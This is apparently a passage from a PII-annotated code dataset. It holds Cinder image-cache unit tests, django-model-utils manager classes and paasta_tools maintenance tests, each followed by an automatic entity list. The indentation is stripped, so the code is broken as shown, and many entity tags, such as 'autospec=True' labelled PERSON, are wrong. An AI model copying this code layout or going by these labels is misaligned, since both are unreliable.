# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from datetime import timedelta
import ddt
import mock
from oslo_utils import timeutils
from cinder import context as ctxt
from cinder.db.sqlalchemy import models
from cinder.image import cache as image_cache
from cinder import objects
from cinder import test
from cinder.tests.unit import fake_constants as fake
@ddt.ddt
class ImageVolumeCacheTestCase(test.TestCase):
def setUp(self):
super(ImageVolumeCacheTestCase, self).setUp()
self.mock_db = mock.Mock()
self.mock_volume_api = mock.Mock()
self.context = ctxt.get_admin_context()
self.volume = models.Volume()
vol_params = {'id': fake.VOLUME_ID,
'host': 'foo@bar#whatever',
'cluster_name': 'cluster',
'size': 0}
self.volume.update(vol_params)
self.volume_ovo = objects.Volume(self.context, **vol_params)
def _build_cache(self, max_gb=0, max_count=0):
cache = image_cache.ImageVolumeCache(self.mock_db,
self.mock_volume_api,
max_gb,
max_count)
cache.notifier = self.notifier
return cache
def _build_entry(self, size=10):
entry = {
'id': 1,
'host': 'test@foo#bar',
'cluster_name': 'cluster@foo#bar',
'image_id': 'PI:KEY',
'image_updated_at': timeutils.utcnow(with_timezone=True),
'volume_id': '70a599e0-31e7-49b7-b260-868f441e862b',
'size': size,
'last_used': timeutils.utcnow(with_timezone=True)
}
return entry
def test_get_by_image_volume(self):
cache = self._build_cache()
ret = {'id': 1}
volume_id = '70a599e0-31e7-49b7-b260-868f441e862b'
self.mock_db.image_volume_cache_get_by_volume_id.return_value = ret
entry = cache.get_by_image_volume(self.context, volume_id)
self.assertEqual(ret, entry)
self.mock_db.image_volume_cache_get_by_volume_id.return_value = None
entry = cache.get_by_image_volume(self.context, volume_id)
self.assertIsNone(entry)
def test_evict(self):
cache = self._build_cache()
entry = self._build_entry()
cache.evict(self.context, entry)
self.mock_db.image_volume_cache_delete.assert_called_once_with(
self.context,
entry['volume_id']
)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.evict', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(entry['host'], msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
@ddt.data(True, False)
def test_get_entry(self, clustered):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': entry['image_updated_at']
}
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = entry
if not clustered:
self.volume_ovo.cluster_name = None
expect = {'host': self.volume.host}
else:
expect = {'cluster_name': self.volume.cluster_name}
found_entry = cache.get_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
self.assertDictEqual(entry, found_entry)
(self.mock_db.
image_volume_cache_get_and_update_last_used.assert_called_once_with)(
self.context,
entry['image_id'],
**expect
)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.hit', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(entry['host'], msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
def test_get_entry_not_exists(self):
cache = self._build_cache()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': timeutils.utcnow(with_timezone=True)
}
image_id = 'PI:KEY'
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = None
found_entry = cache.get_entry(self.context,
self.volume_ovo,
image_id,
image_meta)
self.assertIsNone(found_entry)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.miss', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(self.volume.host, msg['payload']['host'])
self.assertEqual(image_id, msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
@mock.patch('cinder.objects.Volume.get_by_id')
def test_get_entry_needs_update(self, mock_volume_by_id):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': entry['image_updated_at'] + timedelta(hours=2)
}
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = entry
mock_volume = mock.MagicMock()
mock_volume_by_id.return_value = mock_volume
found_entry = cache.get_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
# Expect that the cache entry is not returned and the image-volume
# for it is deleted.
self.assertIsNone(found_entry)
self.mock_volume_api.delete.assert_called_with(self.context,
mock_volume)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.miss', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(self.volume.host, msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
def test_create_cache_entry(self):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'updated_at': entry['image_updated_at']
}
self.mock_db.image_volume_cache_create.return_value = entry
created_entry = cache.create_cache_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
self.assertEqual(entry, created_entry)
self.mock_db.image_volume_cache_create.assert_called_once_with(
self.context,
self.volume_ovo.host,
self.volume_ovo.cluster_name,
entry['image_id'],
entry['image_updated_at'].replace(tzinfo=None),
self.volume_ovo.id,
self.volume_ovo.size
)
def test_ensure_space_unlimited(self):
cache = self._build_cache(max_gb=0, max_count=0)
has_space = cache.ensure_space(self.context, self.volume)
self.assertTrue(has_space)
self.volume.size = 500
has_space = cache.ensure_space(self.context, self.volume)
self.assertTrue(has_space)
def test_ensure_space_no_entries(self):
cache = self._build_cache(max_gb=100, max_count=10)
self.mock_db.image_volume_cache_get_all.return_value = []
self.volume_ovo.size = 5
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.volume_ovo.size = 101
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertFalse(has_space)
def test_ensure_space_need_gb(self):
cache = self._build_cache(max_gb=30, max_count=10)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=12)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
entry3 = self._build_entry(size=10)
entries.append(entry3)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 15
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(2, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
mock_delete.assert_any_call(self.context, entry3)
def test_ensure_space_need_count(self):
cache = self._build_cache(max_gb=30, max_count=2)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=10)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 12
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(1, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
def test_ensure_space_need_gb_and_count(self):
cache = self._build_cache(max_gb=30, max_count=3)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=10)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
entry3 = self._build_entry(size=12)
entries.append(entry3)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 16
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(2, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
mock_delete.assert_any_call(self.context, entry3)
def test_ensure_space_cant_free_enough_gb(self):
cache = self._build_cache(max_gb=30, max_count=10)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = list(self._build_entry(size=25))
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 50
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertFalse(has_space)
mock_delete.assert_not_called()
",12065,"[['PERSON', 'fake_constants'], ['LOCATION', 'TestCase'], ['PERSON', ""msg['priority""], ['PERSON', ""msg['priority""], ['PERSON', ""msg['priority""], ['PERSON', 'mock_volume_by_id.return_value = mock_volume\n\n '], ['PERSON', ""msg['priority""], ['PERSON', 'entry2'], ['PERSON', 'entry3 = self._build_entry(size=10'], ['PERSON', 'max_count=2'], ['PERSON', 'entry2'], ['PERSON', 'entry2'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['URL', 'cinder.im'], ['URL', 'self.mo'], ['URL', 'mock.Mo'], ['URL', 'self.mo'], ['URL', 'mock.Mo'], ['URL', 'self.co'], ['URL', 'ctxt.ge'], ['URL', 'self.co'], ['URL', 'cache.Im'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'cache.no'], ['URL', 'self.no'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'ovo.cl'], ['URL', 'self.volume.cl'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'used.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'mock.pa'], ['URL', 'cinder.objects.Volume.ge'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'mock.Ma'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'api.delete.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'create.re'], ['URL', 'cache.cr'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'create.as'], ['URL', 'self.co'], ['URL', 'ovo.cl'], ['URL', 'ovo.id'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.volume.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'delete.as']]"
73,"from types import ClassType
import warnings
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.fields.related import OneToOneField
from django.db.models.manager import Manager
from django.db.models.query import QuerySet
import django
class InheritanceQuerySet(QuerySet):
def select_subclasses(self, *subclasses):
if not subclasses:
subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects()
if isinstance(rel.field, OneToOneField)
and issubclass(rel.field.model, self.model)]
new_qs = self.select_related(*subclasses)
new_qs.subclasses = subclasses
return new_qs
def _clone(self, klass=None, setup=False, **kwargs):
for name in ['subclasses', '_annotated']:
if hasattr(self, name):
kwargs[name] = getattr(self, name)
return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs)
def annotate(self, *args, **kwargs):
qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs)
qset._annotated = [a.default_alias for a in args] + kwargs.keys()
return qset
def get_subclass(self, obj):
""""""
FIX see https://bitbucket.PI:KEY
and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses
""""""
def get_attribute(obj, s):
try:
return getattr(obj,s, False)
except obj.__class__.DoesNotExist:
return False
if django.VERSION[0:2] < (1, 5):
sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj]
else:
sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj]
return sub_obj[0]
def iterator(self):
iter = super(InheritanceQuerySet, self).iterator()
if getattr(self, 'subclasses', False):
for obj in iter:
sub_obj = self.get_subclass(obj)
if getattr(self, '_annotated', False):
for k in self._annotated:
setattr(sub_obj, k, getattr(obj, k))
yield sub_obj
else:
for obj in iter:
yield obj
class InheritanceManager(models.Manager):
use_for_related_fields = True
def get_query_set(self):
return InheritanceQuerySet(self.model)
def select_subclasses(self, *subclasses):
return self.get_query_set().select_subclasses(*subclasses)
def get_subclass(self, *args, **kwargs):
return self.get_query_set().select_subclasses().get(*args, **kwargs)
class InheritanceCastMixin(object):
def cast(self):
results = tuple(self.values_list('pk', 'real_type'))
type_to_pks = {}
for pk, real_type_id in results:
type_to_pks.setdefault(real_type_id, []).append(pk)
content_types = ContentType.objects.in_bulk(type_to_pks.keys())
pk_to_child = {}
for real_type_id, pks in type_to_pks.iteritems():
content_type = content_types[real_type_id]
child_type = content_type.model_class()
children = child_type._default_manager.in_bulk(pks)
for pk, child in children.iteritems():
pk_to_child[pk] = child
children = []
# sort children into same order as parents where returned
for pk, real_type_id in results:
children.append(pk_to_child[pk])
return children
class QueryManager(models.Manager):
def __init__(self, *args, **kwargs):
if args:
self._q = args[0]
else:
self._q = models.Q(**kwargs)
super(QueryManager, self).__init__()
def order_by(self, *args):
self._order_by = args
return self
def get_query_set(self):
qs = super(QueryManager, self).get_query_set().filter(self._q)
if hasattr(self, '_order_by'):
return qs.order_by(*self._order_by)
return qs
class PassThroughManager(models.Manager):
""""""
Inherit from this Manager to enable you to call any methods from your
custom QuerySet class from your manager. Simply define your QuerySet
class, and return an instance of it from your manager's `get_query_set`
method.
Alternately, if you don't need any extra methods on your manager that
aren't on your QuerySet, then just pass your QuerySet class to the
``for_queryset_class`` class method.
class PostQuerySet(QuerySet):
def enabled(self):
return self.filter(disabled=False)
class Post(models.Model):
objects = PassThroughManager.for_queryset_class(PostQuerySet)()
""""""
# pickling causes recursion errors
_deny_methods = ['__getstate__', '__setstate__', '_db']
def __init__(self, queryset_cls=None):
self._queryset_cls = queryset_cls
super(PassThroughManager, self).__init__()
def __getattr__(self, name):
if name in self._deny_methods:
raise AttributeError(name)
return getattr(self.get_query_set(), name)
def get_query_set(self):
if self._queryset_cls is not None:
kargs = {'model': self.model}
if hasattr(self, '_db'):
kargs['using'] = self._db
return self._queryset_cls(**kargs)
return super(PassThroughManager, self).get_query_set()
@classmethod
def for_queryset_class(cls, queryset_cls):
class _PassThroughManager(cls):
def __init__(self):
return super(_PassThroughManager, self).__init__()
def get_query_set(self):
kwargs = {}
if hasattr(self, ""_db""):
kwargs[""using""] = self._db
return queryset_cls(self.model, **kwargs)
return _PassThroughManager
def manager_from(*mixins, **kwds):
""""""
Returns a Manager instance with extra methods, also available and
chainable on generated querysets.
(By George Sakkis, originally posted at
http://djangosnippets.org/snippets/2117/)
:param mixins: Each ``mixin`` can be either a class or a function. The
generated manager and associated queryset subclasses extend the mixin
classes and include the mixin functions (as methods).
:keyword queryset_cls: The base queryset class to extend from
(``django.db.models.query.QuerySet`` by default).
:keyword manager_cls: The base manager class to extend from
(``django.db.models.manager.Manager`` by default).
""""""
warnings.warn(
""manager_from is pending deprecation; use PassThroughManager instead."",
PendingDeprecationWarning,
stacklevel=2)
# collect separately the mixin classes and methods
bases = [kwds.get('queryset_cls', QuerySet)]
methods = {}
for mixin in mixins:
if isinstance(mixin, (ClassType, type)):
bases.append(mixin)
else:
try: methods[mixin.__name__] = mixin
except AttributeError:
raise TypeError('Mixin must be class or function, not %s' %
mixin.__class__)
# create the QuerySet subclass
id = hash(mixins + tuple(kwds.iteritems()))
new_queryset_cls = type('Queryset_%d' % id, tuple(bases), methods)
# create the Manager subclass
bases[0] = manager_cls = kwds.get('manager_cls', Manager)
new_manager_cls = type('Manager_%d' % id, tuple(bases), methods)
# and finally override new manager's get_query_set
super_get_query_set = manager_cls.get_query_set
def get_query_set(self):
# first honor the super manager's get_query_set
qs = super_get_query_set(self)
# and then try to bless the returned queryset by reassigning it to the
# newly created Queryset class, though this may not be feasible
if not issubclass(new_queryset_cls, qs.__class__):
raise TypeError('QuerySet subclass conflict: cannot determine a '
'unique class for queryset instance')
qs.__class__ = new_queryset_cls
return qs
new_manager_cls.get_query_set = get_query_set
return new_manager_cls()
",8353,"[['PERSON', 'qset = super(InheritanceQuerySet'], ['NRP', 'sub_obj'], ['PERSON', 'order_by'], ['PERSON', 'kargs'], ['PERSON', 'kwds'], ['PERSON', 'George Sakkis'], ['PERSON', 'mixin.__class'], ['LOCATION', 'qs.__class'], ['URL', 'https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses'], ['URL', 'http://djangosnippets.org/snippets/2117/'], ['URL', 'django.contrib.contenttypes.mo'], ['URL', 'django.db.models.fields.re'], ['URL', 'django.db.models.ma'], ['URL', 'django.db.mo'], ['URL', 'rel.va'], ['URL', 'self.mo'], ['URL', 'meta.ge'], ['URL', 'rel.fi'], ['URL', 'rel.field.mo'], ['URL', 'self.mo'], ['URL', 'self.se'], ['URL', 'qs.su'], ['URL', 'a.de'], ['URL', 'kwargs.ke'], ['URL', 'django.VE'], ['URL', 'self.su'], ['URL', 'self.su'], ['URL', 'self.ge'], ['URL', 'models.Ma'], ['URL', 'self.mo'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.va'], ['URL', 'pks.se'], ['URL', 'ContentType.objects.in'], ['URL', 'pks.ke'], ['URL', 'pks.it'], ['URL', 'type.mo'], ['URL', 'manager.in'], ['URL', 'children.it'], ['URL', 'models.Ma'], ['URL', 'models.Ma'], ['URL', 'self.fi'], ['URL', 'models.Mo'], ['URL', 'PassThroughManager.fo'], ['URL', 'self.ge'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'django.db.mo'], ['URL', 'django.db.models.manager.Ma'], ['URL', 'kwds.ge'], ['URL', 'kwds.it'], ['URL', 'kwds.ge'], ['URL', 'cls.ge'], ['URL', 'cls.ge']]"
74,"# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the ""License"");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an ""AS IS"" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from paasta_tools import paasta_maintenance
@mock.patch(""paasta_tools.mesos_maintenance.is_host_drained"", autospec=True)
@mock.patch(
""paasta_tools.mesos_maintenance.get_hosts_past_maintenance_start"", autospec=True
)
def test_is_safe_to_kill(mock_get_hosts_past_maintenance_start, mock_is_host_drained):
mock_is_host_drained.return_value = False
mock_get_hosts_past_maintenance_start.return_value = []
assert not paasta_maintenance.is_safe_to_kill(""blah"")
mock_is_host_drained.return_value = False
mock_get_hosts_past_maintenance_start.return_value = [""blah""]
assert paasta_maintenance.is_safe_to_kill(""blah"")
mock_is_host_drained.return_value = True
mock_get_hosts_past_maintenance_start.return_value = [""blah""]
assert paasta_maintenance.is_safe_to_kill(""blah"")
mock_is_host_drained.return_value = True
mock_get_hosts_past_maintenance_start.return_value = []
assert paasta_maintenance.is_safe_to_kill(""blah"")
@mock.patch(""paasta_tools.paasta_maintenance.is_hostname_local"", autospec=True)
def test_is_safe_to_drain_rejects_non_localhosts(mock_is_hostname_local,):
mock_is_hostname_local.return_value = False
assert paasta_maintenance.is_safe_to_drain(""non-localhost"") is False
@mock.patch(""paasta_tools.paasta_maintenance.getfqdn"", autospec=True)
@mock.patch(""paasta_tools.paasta_maintenance.gethostname"", autospec=True)
def test_is_hostname_local_works(mock_gethostname, mock_getfqdn):
mock_gethostname.return_value = ""foo""
mock_getfqdn.return_value = ""foo.bar""
assert paasta_maintenance.is_hostname_local(""localhost"") is True
assert paasta_maintenance.is_hostname_local(""foo"") is True
assert paasta_maintenance.is_hostname_local(""foo.bar"") is True
assert paasta_maintenance.is_hostname_local(""something_different"") is False
@mock.patch(
""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True
)
def test_are_local_tasks_in_danger_fails_safe_with_false(
mock_load_system_paasta_config,
):
""""""If something unexpected happens that we don't know how to
interpret, we make sure that we fail with ""False"" so that processes
move on and don't deadlock. In general the answer to ""is it safe to drain""
is ""yes"" if mesos can't be reached, etc""""""
mock_load_system_paasta_config.side_effect = Exception
assert paasta_maintenance.are_local_tasks_in_danger() is False
@mock.patch(
""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True
)
@mock.patch(
""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True
)
def test_are_local_tasks_in_danger_is_false_with_nothing_running(
mock_marathon_services_running_here, mock_load_system_paasta_config
):
mock_marathon_services_running_here.return_value = []
assert paasta_maintenance.are_local_tasks_in_danger() is False
@mock.patch(
""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True
)
@mock.patch(
""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True
)
@mock.patch(""paasta_tools.paasta_maintenance.get_backends"", autospec=True)
@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy"", autospec=True)
def test_are_local_tasks_in_danger_is_false_with_an_unhealthy_service(
mock_is_healthy_in_haproxy,
mock_get_backends,
mock_marathon_services_running_here,
mock_load_system_paasta_config,
):
mock_is_healthy_in_haproxy.return_value = False
mock_marathon_services_running_here.return_value = [(""service"", ""instance"", 42)]
assert paasta_maintenance.are_local_tasks_in_danger() is False
mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)
@mock.patch(
""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True
)
@mock.patch(
""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True
)
@mock.patch(""paasta_tools.paasta_maintenance.get_backends"", autospec=True)
@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy"", autospec=True)
@mock.patch(""paasta_tools.paasta_maintenance.synapse_replication_is_low"", autospec=True)
def test_are_local_tasks_in_danger_is_true_with_an_healthy_service_in_danger(
mock_synapse_replication_is_low,
mock_is_healthy_in_haproxy,
mock_get_backends,
mock_marathon_services_running_here,
mock_load_system_paasta_config,
):
mock_is_healthy_in_haproxy.return_value = True
mock_synapse_replication_is_low.return_value = True
mock_marathon_services_running_here.return_value = [(""service"", ""instance"", 42)]
assert paasta_maintenance.are_local_tasks_in_danger() is True
mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)
assert mock_synapse_replication_is_low.call_count == 1
@mock.patch(
""paasta_tools.paasta_maintenance.load_marathon_service_config"", autospec=True
)
@mock.patch(
""paasta_tools.paasta_maintenance.load_smartstack_info_for_service"", autospec=True
)
@mock.patch(
""paasta_tools.paasta_maintenance.get_expected_instance_count_for_namespace"",
autospec=True,
)
@mock.patch(
""paasta_tools.paasta_maintenance.get_replication_for_services"", autospec=True
)
def test_synapse_replication_is_low_understands_underreplicated_services(
mock_get_replication_for_services,
mock_get_expected_instance_count_for_namespace,
mock_load_smartstack_info_for_service,
mock_load_marathon_service_config,
):
mock_load_marathon_service_config.return_value.get_registrations.return_value = (
""service.main""
)
mock_get_expected_instance_count_for_namespace.return_value = 3
mock_load_smartstack_info_for_service.return_value = {
""local_region"": {""service.main"": ""up""}
}
mock_get_replication_for_services.return_value = {""service.main"": 1}
local_backends = [""foo""]
system_paasta_config = mock.MagicMock()
assert (
paasta_maintenance.synapse_replication_is_low(
service=""service"",
instance=""instance"",
system_paasta_config=system_paasta_config,
local_backends=local_backends,
)
is True
)
@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True)
def test_is_healthy_in_harproxy_healthy_path(mock_gethostbyname,):
mock_gethostbyname.return_value = ""127.0.0.1""
local_port = 42
backends = [
{""status"": ""UP"", ""pxname"": ""service.main"", ""svname"": ""127.0.0.1:42_hostname""}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is True
)
@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True)
def test_is_healthy_in_haproxy_unhealthy_path(mock_gethostbyname,):
mock_gethostbyname.return_value = ""127.0.0.1""
local_port = 42
backends = [
{""status"": ""DOWN"", ""pxname"": ""service.main"", ""svname"": ""127.0.0.1:42_hostname""}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is False
)
@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True)
def test_is_healthy_in_haproxy_missing_backend_entirely(mock_gethostbyname,):
mock_gethostbyname.return_value = ""127.0.0.1""
local_port = 42
backends = [
{
""status"": ""DOWN"",
""pxname"": ""service.main"",
""svname"": ""127.0.0.1:666_otherhostname"",
}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is False
)
",8242,"[['DATE_TIME', '2015-2016'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'paasta_maintenance.is_safe_to_drain(""non'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', '@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', '@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['NRP', 'mock_synapse_replication_is_low.call_count =='], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'mock.pa'], ['URL', 'tools.me'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.me'], ['URL', 'maintenance.ge'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'local.re'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostname.re'], ['URL', 'getfqdn.re'], ['URL', 'foo.ba'], ['URL', 'maintenance.is'], ['URL', 'maintenance.is'], ['URL', 'maintenance.is'], ['URL', 'foo.ba'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'config.si'], ['URL', 'maintenance.ar'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], 